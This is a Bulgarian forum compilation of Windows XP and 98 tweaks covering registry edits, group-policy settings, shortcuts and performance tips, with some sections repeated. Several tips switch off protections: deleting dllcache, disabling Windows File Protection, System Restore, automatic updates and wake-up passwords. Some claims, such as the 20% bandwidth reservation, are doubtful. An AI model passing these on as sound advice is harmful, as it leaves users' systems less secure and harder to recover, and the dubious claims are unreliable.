Отидете в C:\WINDOWS\system32\dllcache и изтрийте всичко там – файловете са много и заемат около 500 MB – това са копия на файлове използвани от Windows, който има функцията да си прави копие на всеки файл. Тази функция носи гръмкото название Windows File Protection, а удачноста е отново спорна. Със сигурност обаче правене на копия на файлове за щяло и нещяло забавя компютъра ви. За това също има лек – стартирайте отново ‘gpedit.msc’ от RUN. Там отидете в Computer Configuration/Administrative Templates/System/Windows File Protection, в дясно намерете Set Windows File Protection scanning – сложете му стойност Disabled, а на Limit Windows File Protection cache size – Enabled, и задайте минималния размер – 1 MB

 

12 – System Restore

System Restore е полезна функция, която има за цел когато се случи неизбежното (да ви се скапе Windows-а) бързо и лесно да се върнете към своята работа, но освен че заема много място и че забавя компютъра ви тя не винаги работи. Докато сте в Policy Editor може би ще пожелаете да се отървете и от нея. В Computer Configuration/Administrative Templates/System/System Restore е сърцето на System Restore. Там има само два обекта – задайте и на двата стойности Enabled – първото е за спиране на System Restore, а второто ще направи така че да не остане и следа от съществуването на такова нещо Smile .

 

13 – ускорение на стартирането на Windows

Ще представя два метода, които лично при мен намалиха времето за стартиране с около 20 секунди. Първо създайте batch файл с името ntosboot.bat например. В него напишете следното:

del "c:\windows\prefetch\ntosboot-*.*" /q

и го запишете в C:\ . След това стартирайте ‘gpedit.msc’ – отидете в Computer Configuration/System Settings/Scripts – кликнете два пъти на Shutdown, след това Add и намерете файла който създадохте. След това стартирайте ‘devmgmt.msc’ и на Primary IDE Channel дайте Properties. За устройството, което липсва задайте Device Type: None, след това повторете същото за Secondary IDE Channel. Ако някой ден си купите DVD и след като го инсталирате то не работи си припомнете тази точка Smile и разрешете отново устройството

 

14

1. Стартирай Regedit.

 

2. Намерете в регистрито HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.

 

3. Кликвате на "Control" Folder.

 

4. После избирате "WaitToKillServiceTimeout"

 

5. С десния бутон на мишката и избирате Modify.

 

6. Избирате стойност по-малка от 2000 (Моята е 200).

 

 

1. И нещо много интересно в тази страница:

[HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \Dfrg\BootOptimizeFunction]

Enable = "Y" ,според което излиза, че си има вградена оптимизация на стартовият процес (на практика - дефрагментация), но трябвало да се разреши

 

Проблем с изтриването на филми

Често като се опитате да изтриете някой филм, Windows ви казва че файлът се използва от друго приложение.

За да премахнете този проблем, трябва да изтриете следния запис в регистъра на Windows:

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{87D62D94-71B3-4b9a-9489-5FE6850DC73E}

 

4. бавно баузване между WinXP i Win98 (важи и за LAN мрежи, пробвано е и работи безотказно)

 

отиваш на Start>>Run - там пишеш "regedit". Отваря ти се Registry Editor-а.

След това търсиш следният ключ:

 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr

entVersion\Explorer\RemoteComputer\NameSpace

Tам ще видиш два ключа:

 

Ключ Nr:1 {2227A280-3AEA-1069-A2DE-08002B30309D}

Ключ Nr:2 {D6277990-4C6A-11CF-8D87-00AA0060F5BF}

 

изтрвате вторият "ключ" и браузването чувствително ще се подобри...

 

Искам да подчертая че тези оптимизации, не са измислени от мен, събирани са от мрежата, и сега ви ги давам в събран вид.

Всички оптимизации са изпробвани от мен, и работят... някои от тях са спорни, много хора твърдят че може да се влоши производителноста на windows с тях ..... е, аз не забелязах подобно нещо, определено има подобрение

За точки 11 и 13 гарантирам, че нищо няма да му стане на Windows XP, абсолютно съм сигурен, на всички машини до които съм имал достъп съм го правил и няма никакъв проблем.

Точка 6 в интерес на истината е малко недомислена, все пак XP-то си намира кеша без грешка.

По точка 7, то си е казано "само аки имаш над 256МБ" ти ако си бил с по малко ..... грешката е твоя.

Но за точки 11 и 13 давам гаранции че работят, просто прави точно това което е описано.

Един съвет.

- Направете си имидж на диска, и си играйте с разните му там програми и оптимизации, в такъв случаи и да скапете нещо си връщате инсталацията за 5 мин

Никога не обяснявай. Пред приятели не се налага, а враговете няма да повярват. Виктор Грейсън

Хората те оценяват най-пълно, когато положат цветя на гроба ти.(Кърт Вонегът)

Никоя война не е свещена!

Храбрите не живеят вечно, но предпазливите въобще не живеят.

 

Aсоцииране на иконка с устройство

 

Oтворете regedit. Отидете на HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer. Ако не намирате ключ DriveIcons, създайте такъв. Под този ключ, създайте нов именуван с буквата на желаното устройство (примерно C за вашето C:\ у-во). За да смените иконката, създайте ключ под този на у-вото, с име DefaultIcon. В дясната страна на regedit ще видите стринг (Default). Стойността трябва да е пътят към иконката (примерно D:\Documents\C Drive Icon.ico).

 

 

 

Премахване на Windows Picture and Fax Viewer като основна програма за отваряне на картинки

 

Не знам други програми как се интегрират, но верния ми ACDSee 3.1 не може да стане основен преди тази настройка. Дори и да му укажа да се асоцийра с всички изображения, Windows ПАК си знае неговото.

Ето как да се изключи:

Пускаме си regedit (Start Menu -> Run и пишем regedit)

После разклюнявяме дървото на регистратурата по следния образец:

HKEY_CLASSES_ROOT\SystemFileAssociations\image\ShellEx\ContextMenuHandlers

и ще видим ключа ShellImagePreview.

Най-спокойно си го трием и си затваряме regedit. Оттам-нататък пей сърце.

 

ВАЖНО: Ако чувствате, че може да ви потрябва някога, моля направете си регистри файл с настройката преди да изтривате ключа. Как?

Дясно бутонче върху ShellImagePreview ключа и "Export". Пишете някакво име и си запазвате .REGфайл. После само си кликате два пъти и избирате "Yes".

Настройката е изпробвана и работи, ако нещо се обърка, то вината е ваша. не съм отговорен за повреди.

 

Докато се ровех в Интернет намерих един доста добър сайт с полезни трикове за Windows XP, които са под формата на файлове, които можете лесно да инсталирате. Ето инструкциите от самия сайт:

 

За да използвате Regedit файловете: Запишете REG файла на вашия твърд диск, чукнете го два пъти с мишката и отговорете с "yes" на въпроса за импортиране. REG файловете могат да бъдат разглеждани с Notepad чрез чукване с десен бутон върху тях и избиране на "Edit".

 

За да използвате VBS файловете: Изтеглете .vbs файла и го запаметете на вашия твърд диск (можете да го направите като чукнете върху линка към файла с десен бутон и изберете Save Target As). След това чукнете два пъти върху vbsфайла и ще получите съобщени, когато скрипта приключи инсталирането.

 

Ето и самият сайт, който съдържа около 400 tweaks (трика) - http://www.kellys-ko...m/xp_tweaks.htm

 

Също така автора е направил доста добро описание на често срещаните проблеми с Windows XP и начините на решаването им - http://www.kellys-ko....com/xp_abc.htm

In The Darkness We All Shall Rise!

 

----------------------------------------

Господи, дари ме със спокойствието да приема нещата, които не мога да променя,

със смелостта да променя нещата, които мога,

и с мъдростта винаги да правя разлика между двете.

Премахване на Windows Picture and Fax Viewer като основна програма за отваряне на картинки

 

Не знам други програми как се интегрират, но верния ми ACDSee 3.1 не може да стане основен преди тази настройка. Дори и да му укажа да се асоцийра с всички изображения, Windows ПАК си знае неговото.

Ето как да се изключи:

Пускаме си regedit (Start Menu -> Run и пишем regedit)

После разклюнявяме дървото на регистратурата по следния образец:

HKEY_CLASSES_ROOT\SystemFileAssociations\image\ShellEx\ContextMenuHandlers

и ще видим ключа ShellImagePreview.

Най-спокойно си го трием и си затваряме regedit. Оттам-нататък пей сърце.

 

ВАЖНО: Ако чувствате, че може да ви потрябва някога, моля направете си регистри файл с настройката преди да изтривате ключа. Как?

Дясно бутонче върху ShellImagePreview ключа и "Export". Пишете някакво име и си запазвате .REGфайл. После само си кликате два пъти и избирате "Yes".

Настройката е изпробвана и работи, ако нещо се обърка, то вината е ваша. не съм отговорен за повреди.

 

Трябваше да го му сложа запазена марка (™®) на това. Да не ми го копират.  :lol:

Шегувам се, разбира се.

 

Да добавя и още три неща:

 

Как да си сложим фон на toolbar-a на Internet Explorer и Windows Explorer

Ако имате някоя хубава текстурка и умирате да си я сложите за фон на горните ленти в Windows Explorer и Internet Explorer, ето как става:

Внимание: това работи само с .BMP файлове. JPG, GIF и др. НЕ се поддържат.

1. Пускате Regedit (Start Menu -> Run и пишете regedit)

2. Разклонявате по следния образец:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar

3. Както сте избрали Toolbar, кликате с десния бутон в дясната част и от единственото меню New избирате String Value.

4. Появява се нова стойност, която вие кръщавате "BackBitmap" (без кавичките) и кликате два пъти върху нея. В долното поле Value Data си пишете точния път до картинката (BMP), например:

E:\gotina_papka\oshte_edna\gotin_fail.bmp

Отсега-нататък всеки отворен от вас прозорец ще има за фон тази картинка.

 

Как да променим заглавната лента на Internet Explorer

По подразбиране заглавието на лентата е "Microsoft Internet Explorer". Хубаво, де, ама е скучно, няма да е зле да се смени, нали. Ето как:

1. Пускате Regedit (Start Menu -> Run и пишете regedit)

2. Разклонявате по следния образец:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main

3. Както сте избрали Main, вдясно ще видите стойност "Window Title" (да, със интервал)

4. Кликате си върху нея два пъти и в долното поле пишете каквото ви душа желае.

 

Както казват от WS Teleshop: "Но това не е всичко."

 

Как да променим заглавната лента на Windows Media Player

Хайде да го повторим и с Windows Media Player.

1. Пускате Regedit (Start Menu -> Run и пишете regedit)

2. Разклонявате по следния образец:

HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer

3. Вдясно ще видите стойност "TitleBar" (без интервал), кликате и се развихряте.

 

Забележка: каквото и да напишете, Windows ще добави едно "provided by" преди вашите слова.

Оригиналното заглавие е "Windows Media Player", а след намесата ви ще бъде "Windows Media Player provided by kakwoto_ste_si_wyweli"

Трик 1 – Забрана на индексирането на NTFS дяловете

Индексирането помага за по-бързо търсене на файлове, но след забраната му загубеното време в търсене ще е многократно по-малко от това, което отнема индексирането, и спада на производителността, свързан с това. За да забраните индексирането просто кликнете с десния бутон върху NTFS дял и махнете отметката пред Allow Indexing Service to index this disk for fast file searching, и приложете върху всички поддиректории.

Трик 2 – Използвате ли HIBERNATION

Това представлява копиране на рам паметта на дял от хард-диска, след което машината бива изключена. При включване се прави обратния процес и системата зарежда от там, от където сте я спрели. След като тази функция няма да бъде използвана е редно тя да се забрани, от което се печели дисково пространство, равно на обема оперативна памет. Това може да направите от Power options в Control panel.


Трик 3 – Забрана на поддръжката на zip файлове от Windows XP

Тази поддръжка е удачна единствено в случай, че не разполагате с никакво приложение за работа с архивирани файлове, което е рядкост. Функцията може да деинсталирате чрез изпълнението на следния ред от RUN:
regsvr32 /u zipfldr.dll

Трик 4 – Увеличете пропускателната способност на интернет връзката

До болка е позанто, че Windows XP резервира за свои нужди 20% от всяка интернет връзка. Този размер може да намалите до 0% чрез стартиране на 'gpedit.msc' от RUN. Там намерете разклонението Computer Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler – и там кликнете два пъти върху 'Limit reservable bandwidth', намиращ се отдясно и му задайте стойност ENABLED, а за Bandwidth Limit – 0%.

Трик 5 – Настройки на паметта (това се отнася само за потребители които имат над 265 MB RAM – ако Вашата е толкова или по-малко пропуснете тази точка)

Ако имате много памет може да зададете на WindowsXP да държи всичките файлове, които използва там, вместо на хилядократно по-бавната виртуална памет, намираща се върху вашия твърд диск (която по всяка вероятност е силно фрагментирана, което ще отстраним в следващата) точка. За да подсетите да прави това стартирайте отново ‘regedit.exe’ и отидете в HKEY_LOCAL_MACHINESYSTEM/CurrentControlSet/Control/Session Manager/Memory Management/ и там ще откриете DisablePagingExecutive, чиято стойност трябва да бъде 1, ако не е я променете.

След като сте намерили работа на голяма част от оперативната си памет спокойно може да пожертвате още малко в името на системния кеш, който ако бъде увеличен ще ускори работата на твърдия диск, или по скоро ще отмени част от нея, поради простата причина че някой от файловете, съдържанието на папките и иконите ще бъдат ‘кеширани’ - ключа който позволява това се намира при по-горния и се нарича LargeSystemCache и за да се оползотвори по-рационално паметта ви трябва да има стойност 1.

Понякога Windows XP слага някои файлове в кеша, и после – след приключване на работата с тях ‘забравя’ да ги махне от там. За да не се случват подобни работи намерете или създайте ключа AlwaysUnloadDLL в HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorer – и задайте default стойността му 1

Трик 6 – Оптимизарайте на виртуалната памет

Понеже оперативната памет никога не стига на Windows XP му се налага да ползва виртуална, която се намира върху твърдия диск. Когато някое по-лакомо за памет приложение пожелае повече Windows променя постоянно размера на тази памет, което води до нейното фрагментиране, и до по-ниската и производителност. За да предотвратите това първо забранете виртуалната памет от Control panel/System/Advanced/Performance Settings/Advanced/Virtual memory – Change и задайте стойности 0. След това рестартирайте и дефрагментирайте диска си (В My Computer щтракнете върху диска с десния бутон и изберете Properties – Tools/Defragment now). След дефрагментирането отидете там където се задава размера на виртуалната памет и задайте една и съща стойност за минималния и максималния и размер – тази стойност трябва да е около 2.5 пъти размера на оперативната ви памет ако тя е до 256 MB и 2 до 1.5 пъти ако имате повече.

Трик 7 – !!! Ако не сте инсталирали Service Pack 1

Ако не сте го направили има голяма вероятност Service на име uPnP да е пуснат на вашия компютър – което определено НЕ Е здравословно за него. Може да го отстраните чрез изтеглянето на пач от този адрес - http://www.microsoft.com/Downloads/Release.asp?ReleaseID=34951

Трик 8 - Забранете Automatic Updates

Понякога Windows се опитва да ви изненада приятно - но за всяко нещо си има време и място, и ако искате да го накарате да се съобразява с това ще пожелаете да забраните автоматичните Update-и които понякога определено не са адекватни. Това става от System Properties/Automatic Updates – просто махнете отметката пред ‘Keep my computer up to date…’. А когато искате да проверите за налични подобрения пуснете Internet Explorer и от менюто Tools изберете Windows Update.

Трик 9 – Махнете излишните боклуци

Отидете в C:WINDOWSsystem32dllcache и изтрийте всичко там – файловете са много и заемат около 500 MB – това са копия на файлове използвани от Windows, който има функцията да си прави копие на всеки файл. Тази функция носи гръмкото название Windows File Protection, а удачноста е отново спорна. Със сигурност обаче правене на копия на файлове за щяло и нещяло забавя компютъра ви. За това също има лек – стартирайте отново ‘gpedit.msc’ от RUN. Там отидете в Computer Configuration/Administrative Templates/System/Windows File Protection, в дясно намерете Set Windows File Protection scanning – сложете му стойност Disabled, а на Limit Windows File Protection cache size – Enabled, и задайте минималния размер – 1 MB

Трик 10 – Отървете се от System Restore

System Restore е полезна функция, която има за цел когато се случи неизбежното (да ви се скапе Windows-а) бързо и лесно да се върнете към своята работа, но освен че заема много място и че забавя компютъра ви тя не винаги работи. Докато сте в Policy Editor може би ще пожелаете да се отървете и от нея. В Computer Configuration/Administrative Templates/System/System Restore е сърцето на System Restore. Там има само два обекта – задайте и на двата стойности Enabled – първото е за спиране на System Restore, а второто ще направи така че да не остане и следа от съществуването на такова нещо.

 
Трик 11 – Ускорение на стартирането на Windows

На някои може би им омръзна от този банална фраза. Аз обаче ще представя два начина, които лично при мен намалиха времето за стартиране с около 20 секунди. Първо създайте batch файл с името ntosboot.bat например. В него напишете следното:

del "c:windowsprefetchntosboot-*.*" /q

и го запишете в C: . След това стартирайте ‘gpedit.msc’ – отидете в Computer Configuration/windows Settings/Scripts – кликнете два пъти на Shutdown, след това Add и намерете файла който създадохте. След това стартирайте ‘devmgmt.msc’ и на Primary IDE Channel дайте Properties. За устройството, което липсва задайте Device Type: None, след това повторете същото за Secondary IDE Channel. Ако някой ден си купите DVD и след като го инсталирате то не работи си припомнете тази точка и разрешете отново устройството.

Всички тези точки са изпитани от много хора. Въпреки всичко не препоръчвам на начинаещи потребители да изпълняват която и да е от тях.
Тези уроци са сваляни, преведени и дообогатени от различни форуми и други онлайн източници.

 

Създаване на системна дискета за Windows98
Има един лесен начин за създаване на системна дискета под Windows98. Технологията е следната: когато зададете на системата да ви направи такава дискета, тя взема всички файлове от папката C:\Windows\Ebd и ги копира на дискетата. Начина е, ако искате сами да си ги копирате направо на чиста дискета, като резултата ще е еквивалентен, само че няма да минавате през няколко менюта. Ако нямате Windows 98 под ръка, можете да дръпнете архивираната директория от нашия сървър


Промяна на администраторската парола под Windows XP
Има един начин за промяна на администраторската парола под WindowsXP, но за целта трябва да сте се логнали с администраторски акаунт. Та начина е следния: Start -> Settings -> Control Panel -> Administrative tools -> Computer management. Оттам се избира Local Users and Groups -> Users. Там в прозореца чуквате с десен бутон върху Administrator и избирате Set Password... Чуквате върху Proceed върху новопоявилия се прозорец и задавате новата парола. Тази процедура е приложима за всички останали потребители.


Премахване на прозореца за въвеждане на парола след излизане от режим на готовност
За да премахнете прозореца за искане на парола, когато вашия компютър излиза от състояние на готовност (StandBy), чукнете с десния бутон на мишката върху свободно място на вашия десктоп, изберете Properties -> Screen Saver и махнете отметката пред надписа "On Resume, password protect"


Преименуване на множество файлове
Можете да преименувате повече от един файл едновременно: маркирате желаните файлове, чуквате с десен бутон върху първия който искате да преименувате и избирате Rename. Задавате името на файла и след това натискате Enter. Имайте в предвид, че имената на останалите файлове, ще са същите като първоначално преименувания с добавен пореден номер в скоби.


Скриване на имета на файловете в Thumbnail изглед
Можете да скриете имената на файлове, когато превключвате в Thumbnail изглед. Натиснете и задръжте клавиша Shift, докато превключвате в този режим, за да направите това. По същия начин можете да върнете обратно изписването на имената.


Преместване на обект в Windows Explorer
Когато влачите даден обект в Windows Explorer можете да контролирате действието, което ще последва след като пуснете обекта на желаното място:
+ кориране - задръжте натиснат клавиша Ctrl докато влачите (трябва да ви се появи знака "+" до курсора на мишката)
+ преместване - задръжте натиснат клавиша Shift докато влачите (не би трябвало да има нищо до курсора на мишката)
+ създаване на shortcut - задръжте натиснат клавиша Alt докато влачите (би трябвало да ви се появи една стрелкичка до курсора на мишката)


Няколко полезни съвета:
* Ако създадете файл Folder.jpg в дадена папка, тази картинка ще бъде използвана като thumbnail на папката.
* Можете лесно да изберете какви колони ще се показват в Details режима за дадена папка. Просто чукнете с десен бутон върху заглавието на дадена колона. Също така можете лесно да премествате колони, като просто чукнете върху името им с левия бутон и влачите
* За да изтриете даден файл, без да го пращате в кошчето, натиснете и задръжте клавиша Shift докато го триете.
* Когато обработвате множество файлове и ви се появи диалогов прозорец с въпрос, можете да натиснете Shift докато натискате No отговор и по този начин ще отговорите на всички последващи диалгови прозорци с No (т.е. отговора ви се ще приеме като No to All).
* За да запаметите документ с разширение, различно от стандартното (често не можете да избирате разширението на запаметямания документ - например в Notepad) просто напишете името на файла заедно с разширението в кавички ("моят.файл") (иначе ако работите например с Notepad файла ви ще се запише като моят.файл.тхт).
* Можете лесно да отворите даден файл с желана програма, просто като поставите shortcut на програмата в Sent To менюто
* ако искате да отворите даден файл с различна програма от тази по подразбиране задръжте Shift клавиша натиснат, докато чуквате с десен бутов върху него. В менюто, което ще се появи ще видите Open With...
* Има начин да използвате функциите Tile и Cascade върху определени процорци, а не върху всички. Маркирайте желаните прозорци в taskbar-а чрез задържането на клавиша Ctrl и след това чукнете с десния бутон на мишката върху някой от тях и изберете желаното действие. Също чрез такова маркиране можете да затворите група от прозорци.
* една хитринка: можете много лесно да добавите представката "www." и наставката ".com" към името, което сте написали в adress полето в Internet Explorer като напишете името (например google) и след това натиснете Ctrl+Enter.
* за да отворите дадена страница не е задължително да имате стартиран Internet Explorer. Можете просто да напишете името на страницата и в Windows Explorer или в менюто Run...
* можете да видите множество полезни клавишни комбинации в Internet Explorer като направите следното: Help -> Contents and Index -> Accessibility -> Using Internet Explorer keyboard shortcuts.


Как да променим размера на swap (page) файла и неговото местоположение
Щракнете с десен бутон върху My Computer, после следвайте следните стъпки: Properties -> Advanced -> бутона Settings в полето Performance -> Advanced -> бутона Change в полето Virtual Memory. После в полетата Initial size (MB) и Maximum size (MB) задайте размера на swap файла. Препоръчвам ви размера да е един и същ и да бъде 1,5 пъти размера на RAM паметта ви (например 784 МВ при 512 МВ RAM). В същия прозорец можете да зададете на кое устройство да се намира този файл. След като зададете размера и местоположението на swap файла задължително натиснете бутона Set и после ОК.


Как да сменим името на компютъра си
Щракнете с десен бутон върху My Computer, после следвайте следните стъпки: Properties -> Computer name -> Change... и после в полето omputer name напишете новото име на компютъра си.


Изключване на System restore функцията
Малко инфо: тази функция заделя място на харда ви и го пълни с резервна информация в случай, че компютъра ви се сбози. Често обема на заделеното място е доста голям.
За да изключите тази функция направете следното:
Щракнете с десен бутон върху My Computer, после следвайте следните стъпки: Properties -> System restore и сложете отметката пред Turn System Restore on all drives.


Изтриване на дадена папка, за която нямате достъп.
Често се случва да не можетет да изтриете някоя папка и дори да влезете в нея под ХР. Варианта е следния. Изберете папката с десен бутон на мишката и след това: Properties -> Security -> Add... -> в полето под надписа Enter the object name to select напишете вашето потребителско име (името с което влизате в Уиндоус) (ако случайно не го помните има един начин да го намерите: в същия прозорец изберете Advanced... и после натиснете бутона Find Now в новопоявилия се прозорец. Ще ви излезе списък със всички възможни потребители на вашия компютър и вашето потребителско име със сигурност ще е там). След като изберете потребителското си име, натиснете ОК и в текущия прозорец, трябва то да е маркирано, като след това в долната част на прозореца (с име Permisions for потребителското ви име) сложете отметката пред Full Controll и натиснете ОК. Сега вече имате абсолютно пълни права върху съответната папка.


Как да видите кой е във вашия компютър
Щракнете с десен бутон на мишката върху My Computer и изберете Manage. После изберете Shared Folders и от панела вдясно имате три възможности: Shares (показва всички споделени от вас папки), Sessions (показва кой потребител се е вързал към вас и колко файла е отворил), Open Files (показва ви всички отворени файлове от други потребители и съответния потребител.


Как да сменим буквата на дадено устройство (без С: )
Щракнете с десен бутон на мишката върху My Computer и изберете Manage. После иберете Disk Management и в долната част на десния панел щракнете с десен бутон върху устройството, чиято буква искате да смените. От контекстното меню изберете Change Drive Letter and Paths и в новопоявилия се прозоцер изберете Change... и в новия прозорец ще имате падащо меню с възможности за смяна на буквата на устройството. Оттук нататък натискайте само ОК, след като изберете желаната буква.


Коригиране на увисването на системата при стартиране
Ако системата ви увисва за 2 или три минути при стартиране, като при това нямате достъп до Старб бутона или елементите върху таскбара, това най-вероятно се дължи на определена услуга (service), наречена Background Intelligent Transfer, която се изпълнява във фонов режим. За да оправите проблема направете следното: натисенте бутона Старт, след това изберете Run... и в новопоявилия се прозорец напишете msconfig и чукнете OK. После изберете Services и там намерете услугата Background Intelligent Transfer, махнете отметката пред нея и натиснете ОК и рестартирайте.


Премахване на логото при стартиране на Windows
Това ще ускори зареждането на вашата система, така че ако нямате проблеми след това го оставете. Начина е следния (ако сте с ХР): натисенте бутона Старт, след това изберете Run... и в новопоявилия се прозорец напишете msconfig и чукнете OK. После изберете BOOT.INI и сложете отметка пред функцията /NOGUIBOOT, натиснете ОК и рестартирайте. Можете да се върнете към предишното състояние като просто махнете отметката по същия начин.
Ако сте с Windows 98, ето начина: на първо време сменете атрибутите на msdos.sys файла (намира се в главната директория), така че да не бъде повече "Read only". След това го отворете с обикновен текстов редактор (Notepad). След това потърсете във файла следния текст 'Logo=0', а ако няма го създайте. Ако стойността след Logo= е 1, я заменете с 0 и това ще премахне логото на Windows 98. Запишете msdos.sys файла и върнете атрибутите му за "Read only".


Премахването на индексирането на файловете, за да ускорите WindowsХР
WindowsХР пази база с данни за всички файлове на вашия твърд диск, която използва за ускоряване на търсенето на файл. Проблема в случая е, че компютъра ви трябва да индексира всички файлове, което съответно го забавя при отваряне и затваряне на файлове и други операции. Ако не търсите много файлове по компютъра си, можете да изключите индексирането по следния начин: Отворете My Computer и щракнете с десен бутон върху устройството, за което искате да изберете индексирането. В новопоявилия се прозорец махнете отметката пред Allow Indexing Service to index this disk for fast searching и след това натиснете ОК, а после отворилия се прозорец изберете втория радио-бутон (Apply changes to C:\ (D:\, E:\...), subfolders and files). И натиснете ОК, като след това изчакайте да свърши премахването на индексирането и отново натиснете ОК. Нататък ще забележите лека промяна в производителността на компютъра ви.


Изчистване Prefetch папката, за да подобрите производителността на системата си
Това е уникална техника за WinXP. Знаем, че е необходимо периодично да се почистват регистрите и временните файлове за операционните системи Win9X/ME/2000. Prefetch е нова и много полезна техника в Windows XP. Обаче след известно ползване на XP , директорията prefetch може да се напълни с много безполезни и излишни линкове, в Prefetch каталога, което може да забави значително вашия компютър.

За да почистите тези файлове, отворете C(системния дял):/windows/prefetch и изтрийте всички файлове. След това рестартирайте. Препоръчително е да правите това всеки месец.


Повишаване на производителността чрез My Computer
Чукнете с десен бутон върху My Computer -> Properties -> Advanced -> чукнете Settings в полето Performance.
Махнете отметките пред следните полета:
Fade or slide menus into view
Fade or slide ToolTips into view
Fade out menu items after clicking
Show Shadows under menus
Slide open combo boxes
Slide taskbar buttons
Use a background image for each folder type
Use common tasks in folders


Ако CD-то ви работи много бавно (настройване на DMA режима за всички устройства)
Случва се така, че често CD-то ви работи адски бавно и забавя цялата ви система. На всичкото отгоре процесора е на 100% и не можете да направите почти нищо. Една от възможните причини за това, че че Windows XP не винаги успява да нагласи DMA режима за всички устройства успешно и понякога последните работят в режим PIO, който е изключително бавен и остарял. Всички нови оптични устройства поддържат DMA режима, но често Windows ги оставя в режим PIO под подразбиране. Ето начина да се коригира това:

Чукнете с десен бутон върху My Computer -> Manage. В новопоявилия се прозорец изберете Device Manager и в десния прозорец чукнете два пъти върху IDE ATA/ATAPI Controllers, така че да се отворят подкатегориите. Чукнете два пъти върху Primary IDE Channel и след това отидете върху Advanced Settings. В полетата Transfer mode задайте DMA if available. Ако стойността е била PIO Only най-вероятно в това е бил вашият проблем. Повторете същите стъпки и за втория IDE канал (Secondary IDE Channel) в предходния прозорец. Сега остава само да рестартирате.


Auto Login
Чукнете върху бутона Start, натиснете Run... (може директно да натиснете клавишите Win+ R) и напишете control userpasswords2.

В Users махнете отметката пред Users must enter....
Ще ви се появи диалогов прозорец, който ще ви позволи да въведете потребителско име и парола, които да бъдат изпълнявани автоматично.


Win XP не иска да се изключи напълно
Чукнете бутона Start -> Settings -> Control Panel -> Power Options -> APM. В новопоявилия се прозорец сложете отметката пред Enable Advanced Power Management support. Изключете вашия компютър. Би трябвало процеса по изключването да е успешен.


Премахване на докладването за грешки
Чукнете с десен бутон върху My Computer -> Properties -> Advanced -> чукнете върху бутона Error Reporting. Изберете Disable error reporting и сте готови. От същия прозорец може да настроите докладването за грешки (за кои програми да се появява и т.н.)


Показването на опцията Hibernate когато изключвате компютъра си от Shut Down...
Когато ви се появи диалоговия прозорец Shut Down Windows просто натиснете клавиша Shift и опцията StandBy ще се замени с Hybernate. Другият начин е просто в същия диалогов прозорец да натиснете H


Връщане към предишната версия на даден драйвер за някое устройство
Сигурно често ви се е случвало да инсталирате нов драйвер за някое устройство и след това всичко да се скапе. Вместо да преинсталирате наново устройството и да сменяте драйверите му, можете да направите следното:

Чукнете с десен бутон върху My Computer -> Manage. В новопоявилия се прозорец изберете Device Manager и в десния прозорец чукнете два пъти върху типа и след това модела на устройството, за което искате да върнете предишните драйвери. В новопоявилия се прозорец изберете таба Driver и там чукнете върху бутона Roll Back Driver. Ще ви се появи нов прозорец с инструкции, които трябва да следвате. За да направите горните процедури трябва или да се Administrator или да сте в групата Administrators (по подразбиране за домашни потребители)


Създаване на shortcut за ShutDown
Чукнете с десен бутон върху вашия десктоп и изберете New -> Shortcut. Ще ви се появи прозорец, където в полето под Type the location of the item напишете SHUTDOWN -s -t 01 параметъра -s е за изключване и можете да го замените с -r за рестартиране, параметъра -t 01 задава време, след което ще се изключи/рестартира компютъра, като можете да замените 01 с броя на секунди, след които искате да се изпълни операцията, но числото винаги трябва да е с две цифри (ако е по-малко от 10 сложете 0 отпред). След като напишете командата, натиснете Next и в новопоявилия се прозорец задайте име на shortcut-а. След това натиснете Finish. Сега вече можете да зададете клавишна комбинация, с която да се изпълнява този shortcut или просто да го оставите на десктопа си и да го чукнете два пъти с мишката.


Как да заключим бързо компютъра си
Натиснете едновременно клавишите Win+L. Ще бъдете отведени към екрана за начално включване на потребителите.
Можете също така да създадете shortcut, който изпълнява същата функция. Чукнете с десен бутон върху вашия десктоп и изберете New -> Shortcut. Ще ви се появи прозорец, където в полето под Type the location of the item напишете c:\windows\System32\rundll32.exe user32.dll,LockWorkStation. След като напишете командата, натиснете Next и в новопоявилия се прозорец задайте име на shortcut-а. След това натиснете Finish. Сега вече можете да зададете клавишна комбинация, с която да се изпълнява този shortcut или просто да го оставите на десктопа си и да го чукнете два пъти с мишката.


Клавиатура с мишка
Една интересна опция, която понякога може да ви бъде полезна. Чукнете върху бутона Start -> Programs -> Accessories -> Accessibility -> OnScreen Keyboard


Някои полезни клавишни комбинации
Ctrl+Esc показва Start менюто
Win клавиша върши същата операция, ето малко комбинации с него:
Win+D - показва десктопа
Win+E - стартира Windows Explorer
Win+F - търсене на файлове
Win+Ctrl+F - търсене на компютри
Win+F1 - стартира Help and Support Center
Win+R - стартира Run
Win+Pause/Break - стартира System Properties
Win+M - минимизира всички прозорци
Win+Shift+M - отменя минимизирането на всички прозорци
Win+L - заключва компютъра
Win+U - стартира Utility Manager
Още няколко комбинации
Ctrl+Shift+Esc - стартира Task Manager
Shift+F10 - симулира десен бутон на мишката


Влизане в администраторския акаунт от началния прозорец на зареждане на Windows
Ако сте си инсталирали току що Windows или не сте променяли нищо, Welcome Screen-а на Windows е включен по подразбиране. От него обаче не можете да влезете в администраторския акаунт. Един от начините да направите това е да натиснете два пъти клавишите Ctrl+Alt+Del и вече можете да влезете в администраторския акаунт.


Премахване на Shut Down бутона от началния прозорец на зареждане на Windows (Welcome Screen)
Интересна опция, която може да ви е полезна.
Чукнете бутона Start -> Settings -> Control Panel -> Administrative Tools -> Local Security Policy.
В лявата част на новопоявилия се прозорец разширете Security Settings, после разширете Local Policies и изберете Security Options. В дясната част чукнете два пъти върху Shutdown: Allow system to be shut down without having to log on policy и изберете Disabled. Остава само да натиснете "ОК".


Как можете временно да си присвоите администраторски права
Много програми изискват да имате администраторски права, за да можете да ги инсталирате. Най-лесния начин да си присвоите временно такива права, при положение че сте се логнали като нормален потребител е следния: Задръжте натиснат клавиша Shift и чукнете с десен бутон върху инсталационния файл. От появилото се контекстно меню изберете Run as... В новопоявилия се прозорец напишете администраторското име и парола. Тази операция работи също и за програми от Start менюто.


Възстановяване на опреснителната честота при неработещ монитор
